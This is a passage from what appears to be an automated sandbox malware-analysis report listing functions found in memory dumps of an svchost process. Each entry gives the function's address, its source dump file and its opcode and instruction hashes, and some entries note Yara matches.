                                                                                                                      • Opcode Fuzzy Hash: 6ab6f947b4923701c0f11b714fd135c6bdcf04d179f03dc07ccf7b32cb0ba870
                                                                                                                      • Instruction Fuzzy Hash: 0431D276A01619EFDB55DF98CC80BAEB3B5FB48740F454169E500AB244D775ED00CBA4
                                                                                                                      Function 03029730 Relevance: .1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 09f54f9047ad472d8de1e70edc9f058053fd82ef10a1f8454158be66be2e3e91
                                                                                                                      • Instruction ID: f8a724558f31ee711d73b729399d619d4d6d354fb4266215720d2c839914cc83
                                                                                                                      • Opcode Fuzzy Hash: 09f54f9047ad472d8de1e70edc9f058053fd82ef10a1f8454158be66be2e3e91
                                                                                                                      • Instruction Fuzzy Hash: 4A21B675602B24AFC321DF588400B5BBFB5FF88B50F150879A9659B751D770E921CB90
                                                                                                                      Function 030F6BD7 Relevance: .1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 45f86e836843b74d4e5a64218d102bd2df1d81a88229a8c85f881447e1c262c7
                                                                                                                      • Instruction ID: 874ccb6d19c6e84cad3405899e0ef59ba95531793f52e5fcec97f28a55d7ec48
                                                                                                                      • Opcode Fuzzy Hash: 45f86e836843b74d4e5a64218d102bd2df1d81a88229a8c85f881447e1c262c7
                                                                                                                      • Instruction Fuzzy Hash: 2231AE31601214AFCB68CF2AD885A9B7BF4FF8D300B858469E908DF249D770E955CBA4
                                                                                                                      Function 030F60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 24c0c19de911c708ae4b51b1b0ea3cb7ac38167a03d2a25e425e1cbc453e3c7b
                                                                                                                      • Instruction ID: 3054e5c09ed0fd1aa4f8dc233f21146edf60c3c0650f119bee6ec1722ae05e52
                                                                                                                      • Opcode Fuzzy Hash: 24c0c19de911c708ae4b51b1b0ea3cb7ac38167a03d2a25e425e1cbc453e3c7b
                                                                                                                      • Instruction Fuzzy Hash: 0031E475702219AFD712EB99CC50BAFBBB9AB88310F0804A9E641DB741DB31DD008790
                                                                                                                      Function 030307AF Relevance: .1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 19bab2097c97a00256d6dd192015c78b35720630dd7953d90170ac2e91d5b4b2
                                                                                                                      • Instruction ID: 63abef34e950551258f7043de9e9cdcb4de21b9848ec236cee000da55e72d692
                                                                                                                      • Opcode Fuzzy Hash: 19bab2097c97a00256d6dd192015c78b35720630dd7953d90170ac2e91d5b4b2
                                                                                                                      • Instruction Fuzzy Hash: 7031C436A07711DBC711EF24C880AAFBBE9EFC6650F054929FC969B210DA30DC1187D1
                                                                                                                      Function 0302D6AA Relevance: .1, Instructions: 93COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                      • Instruction ID: 11726bf1a7233865e8d375c0c87c8b277d4cc6cc68b489c46df35e8d5b0f77e4
                                                                                                                      • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                      • Instruction Fuzzy Hash: F631E376A02A24AFDB61DE54C884B6FBBF9DB84710F1D8469ED659B200E338DD40CB50
                                                                                                                      Function 0268EA23 Relevance: .1, Instructions: 93COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 79b2f991def7f1eb00f1e7694333a43b59279ec7b4dc4235edefff4c0d7c85a5
                                                                                                                      • Instruction ID: 0018420dd6532eb9bc99f51bffa17ee057b913afaa4eedff819d8a6025e54c00
                                                                                                                      • Opcode Fuzzy Hash: 79b2f991def7f1eb00f1e7694333a43b59279ec7b4dc4235edefff4c0d7c85a5
                                                                                                                      • Instruction Fuzzy Hash: 7F31DF72B106265BD354CE3AC880255B3E6FB88310B548739D928C3B40E774F961CBD0
                                                                                                                      Function 030357C0 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9d9ecf6d7adef816f1a045e2ed1dc536f41ed485d1b674cdb88e23cf22aba365
                                                                                                                      • Instruction ID: ddc654e2f8a940687f7c9317e231e0194b3676ca6ae8daee16f4389678113ab1
                                                                                                                      • Opcode Fuzzy Hash: 9d9ecf6d7adef816f1a045e2ed1dc536f41ed485d1b674cdb88e23cf22aba365
                                                                                                                      • Instruction Fuzzy Hash: D131B439716A05FFDB51DB24DE40AAABBAAFF86310F4450A5E9418BB50D731E831CBC0
                                                                                                                      Function 0306A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                      • Instruction ID: bea268b4da2ff6808365f0cacc37890b3b90fe435da2d18d1512c27e577e127b
                                                                                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                      • Instruction Fuzzy Hash: CA314DB2B02B00AFD7A4DF69DD41B57B7F8BF48B50F08492DA59AD3650E630E900CB64
                                                                                                                      Function 026630F0 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b3a7193cca4b1c69c27edb89fea4d7dbfe206f643ae2d72a1823796722900bd3
                                                                                                                      • Instruction ID: e0273b394f93343ad420c468eabc6ce4f150fa5ed26c0fe2b8ca0792d1702df3
                                                                                                                      • Opcode Fuzzy Hash: b3a7193cca4b1c69c27edb89fea4d7dbfe206f643ae2d72a1823796722900bd3
                                                                                                                      • Instruction Fuzzy Hash: A531AD72A14B108FD368CA7DD849752F7E5AB88304F418A6DE95EC7740CB78E911C780
                                                                                                                      Function 0305438F Relevance: .1, Instructions: 89COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 87f72ef774d4f7b6311402db5d308f2aa5731646fe65599d45f7b467d469b0c9
                                                                                                                      • Instruction ID: 32aa3477d0a7b09df37afed094b54034c39632da59220bb9568ed64fe4b0e349
                                                                                                                      • Opcode Fuzzy Hash: 87f72ef774d4f7b6311402db5d308f2aa5731646fe65599d45f7b467d469b0c9
                                                                                                                      • Instruction Fuzzy Hash: 0C31C435B02305DFDB24EFA9C980AEFB7F9AB84305F00852AE845D7654D770E985CB50
                                                                                                                      Function 030392C5 Relevance: .1, Instructions: 89COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                      • Instruction ID: 3d86f54cd9de2480fa82d32f94e2d54de0f6d27ffcc61203dd0ad7be95baf727
                                                                                                                      • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                      • Instruction Fuzzy Hash: E7317AB56093499FCB01DF18D840A9ABBEDEF89350F0409AAF851DB3A1D731DD14CBA6
                                                                                                                      Function 03087190 Relevance: .1, Instructions: 89COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                      • Instruction ID: 654c76af874d933027aafba0687694d36151155b05d3c4e4c0af1e245052029e
                                                                                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                      • Instruction Fuzzy Hash: BF318C75605206CFCB50CF1CC48095AFBF5FF89750B2985A9E9989B319EB30ED06CB91
                                                                                                                      Function 030EC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                      • Instruction ID: 9a5c0d7cb1988164fde006898ec4cd37e00f22726895a9a0d5b673a02663202b
                                                                                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                      • Instruction Fuzzy Hash: 86210B7FB01755AEDB15EBA58800AFAF7B4EFC0610F44801AFD668A951E636DD50C360
                                                                                                                      Function 0302C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 61ebef1b89f6bf485a3f14b0958b4d3af3f481d1fe4fb7c24e98692fbf9c62f9
                                                                                                                      • Instruction ID: 421b745d99e3910b9ce31b2ea94b96d3e2a02dd2992cb8a9c24a7f2c1648c28c
                                                                                                                      • Opcode Fuzzy Hash: 61ebef1b89f6bf485a3f14b0958b4d3af3f481d1fe4fb7c24e98692fbf9c62f9
                                                                                                                      • Instruction Fuzzy Hash: 593129B55023109BC734FF14CC41BA9B7B9EF85314F5886A9D8859F3C1EA74D981CBA0
                                                                                                                      Function 0302E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                      • Instruction ID: 8ebde2ef9132d073f6380ed81d977151cd57ce1e74cbaec4cf39cab1379c7223
                                                                                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                      • Instruction Fuzzy Hash: CB31AB35602614EFD721DF68C884FAABBF8EF84354F1449A9E552CB690E730EE02CB50
                                                                                                                      Function 031003E6 Relevance: .1, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2856596b027ced11c2f690eed7cdeff71e39939f7200d59cd8518c4e88bdc971
                                                                                                                      • Instruction ID: 295f7eff6a4835c802fcbd1bf00e8ba7ac78a46b41ec66b0b950ea80716c75ee
                                                                                                                      • Opcode Fuzzy Hash: 2856596b027ced11c2f690eed7cdeff71e39939f7200d59cd8518c4e88bdc971
                                                                                                                      • Instruction Fuzzy Hash: AC316F71A00119BFCB18DBA9D894F9FBBB9FB8C214F414169E905E7240DB70AE54CBA4
                                                                                                                      Function 030AE609 Relevance: .1, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 87a0c112f9baa4b5191fb591979deb3fe6e8333346030da9e7dbe9ffc8afc6b5
                                                                                                                      • Instruction ID: 86324a0b044b6b811a0e28f47e7dd862031e15aa6b762f4ac313282b98a48aef
                                                                                                                      • Opcode Fuzzy Hash: 87a0c112f9baa4b5191fb591979deb3fe6e8333346030da9e7dbe9ffc8afc6b5
                                                                                                                      • Instruction Fuzzy Hash: EC31DF79A01605DFCB18CF5CD880DAEB7FAFF88344B158959E8099B390E770EA51CB90
                                                                                                                      Function 03033616 Relevance: .1, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 35193c582fe3f4fea5624c647aea60a47c6e85479bd46bc79d796a8a27164de7
                                                                                                                      • Instruction ID: 0627f540bd1d70abe1efa6ffc27a76fabbfd64fa9a8a1ea78d45cc7976ad9ffb
                                                                                                                      • Opcode Fuzzy Hash: 35193c582fe3f4fea5624c647aea60a47c6e85479bd46bc79d796a8a27164de7
                                                                                                                      • Instruction Fuzzy Hash: 1821F5792477509FCBB5EF04C984B6ABBECFF86B11F0948A9E8410B651C7B0E944CB91
                                                                                                                      Function 03100591 Relevance: .1, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f21075410e4919aae2155646265a615941c44f1bd8e4dc540d3294873880c75
                                                                                                                      • Instruction ID: b92fe74913598f7a53bf29bb6555e7fb13a96df1cb097a0d6e95ce18e2353dc1
                                                                                                                      • Opcode Fuzzy Hash: 8f21075410e4919aae2155646265a615941c44f1bd8e4dc540d3294873880c75
                                                                                                                      • Instruction Fuzzy Hash: 1621E5326146058FD728CE29D880BBAB7A6EFDC310F598478E905DB2C5DBB0F895CB50
                                                                                                                      Function 0305F32A Relevance: .1, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                      • Instruction ID: 0a1dea9465ce8864b6d550dc3ebfb02bc0a3f0bdf80a5f891d9afb40d0460b7e
                                                                                                                      • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                      • Instruction Fuzzy Hash: 0821CF72202301DFD719DF15C445B6BBBE9EF95361F15816DE90A8B2A0EB74E801CB98
                                                                                                                      Function 030B06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6fe82b15f2c8cc7ec61ae56a641f83416e2192574d686f673531ee747e47f778
                                                                                                                      • Instruction ID: 8d00a13b3d3820960c29d9d53b259e502ccb8264c5407cce782139c0f444c7b1
                                                                                                                      • Opcode Fuzzy Hash: 6fe82b15f2c8cc7ec61ae56a641f83416e2192574d686f673531ee747e47f778
                                                                                                                      • Instruction Fuzzy Hash: 92217C75E01229ABCB24DF59C881AFFF7F8FF48740B544069E541AB240D778AD52CBA4
                                                                                                                      Function 030B019F Relevance: .1, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 92a4a247c90dcb9693e3dd0f129f1bd3374327a23a8f5b341c4b3c384ebcc144
                                                                                                                      • Instruction ID: 78f64821886727aa8e815a70c059e80fd7aa3ea974b08d897fce63cfc7f189c3
                                                                                                                      • Opcode Fuzzy Hash: 92a4a247c90dcb9693e3dd0f129f1bd3374327a23a8f5b341c4b3c384ebcc144
                                                                                                                      • Instruction Fuzzy Hash: 76218B75601644ABD715DB68D840BAAB7B8FF88740F1840A9F944DB6A0D734ED50CBA8
                                                                                                                      Function 03069660 Relevance: .1, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 713c4fad81a0219601ffd5f3d90cda358383f0ed03f26864fe7d36266d400084
                                                                                                                      • Instruction ID: 9cbb031a5534cba5b18e1e98903a7f8b34482d2bd18b70e60a096e10467782db
                                                                                                                      • Opcode Fuzzy Hash: 713c4fad81a0219601ffd5f3d90cda358383f0ed03f26864fe7d36266d400084
                                                                                                                      • Instruction Fuzzy Hash: BF212930203B04DBCB31EA25DD00B2B77E9FB84324F144A59F8924ADE8D731A851CB51
                                                                                                                      Function 030B0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 122969d6e4939a00436cf1cc410e5bbdee751f6264a89a4c4d13623a35eef5ab
                                                                                                                      • Instruction ID: a2bf61b393c1ec68e731f69f41cf78f08cb3151541d267b8ee2d1bf16f7cd888
                                                                                                                      • Opcode Fuzzy Hash: 122969d6e4939a00436cf1cc410e5bbdee751f6264a89a4c4d13623a35eef5ab
                                                                                                                      • Instruction Fuzzy Hash: 2221AFB29063459BD711EF69D848BDBF7ECBFD1640F0844A6BC808B251D734DA48C6A6
                                                                                                                      Function 030AD0C0 Relevance: .1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                      • Instruction ID: 526f690c6642df4c4f636f2d97738e3ad114a897d53e73cd83920306d3fc677a
                                                                                                                      • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                      • Instruction Fuzzy Hash: 5E21F272646B00ABC321DF1CDC51B9BBBA4FB88720F04062EF9449B7A0D330D90197A9
                                                                                                                      Function 031001AA Relevance: .1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b34864b3dd223f9e0beca113e43e3b5a9e19687c8b3961a80240c725c9f0299b
                                                                                                                      • Instruction ID: 6f726c5fef73e4290327acf3776d5593e09788ca442ba5ac88d354d054a3fd28
                                                                                                                      • Opcode Fuzzy Hash: b34864b3dd223f9e0beca113e43e3b5a9e19687c8b3961a80240c725c9f0299b
                                                                                                                      • Instruction Fuzzy Hash: FF21E4712042504FD745CB1A88B44F6BFE5EFCA125F0982F6D884CB742C134D907C7A0
                                                                                                                      Function 0306A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b17e7309cb1eaad2f59892ffc4af6796b2c3a57f5d603077ae05d218d7a6ccba
                                                                                                                      • Instruction ID: 4cf42f738af6879a0f23d9850d43ab8d25e287b281a8452066a64865028382ab
                                                                                                                      • Opcode Fuzzy Hash: b17e7309cb1eaad2f59892ffc4af6796b2c3a57f5d603077ae05d218d7a6ccba
                                                                                                                      • Instruction Fuzzy Hash: AE21AC79202B10DFC724EF69CD00B46B7F5AF88704F1884A8A909DB761E331E952CB98
                                                                                                                      Function 0302B765 Relevance: .1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8ee50c55c926b7f53c415d2268a51a1ad08f1996a385dad8d9226efb8eecbdb0
                                                                                                                      • Instruction ID: f416364cd8840d5343d22617847cd772ae58b0f7131e0b515aa8684b32df7522
                                                                                                                      • Opcode Fuzzy Hash: 8ee50c55c926b7f53c415d2268a51a1ad08f1996a385dad8d9226efb8eecbdb0
                                                                                                                      • Instruction Fuzzy Hash: C7217A76102B10DFC725EF68C940F99BBF9FF58708F18496CE00A9BAA1C774A950CB44
                                                                                                                      Function 030FEE26 Relevance: .1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 21a0b68b5e40eee0571c320ec824d0ffefbb4db8e53c8b0ff0b086a4d8da16d2
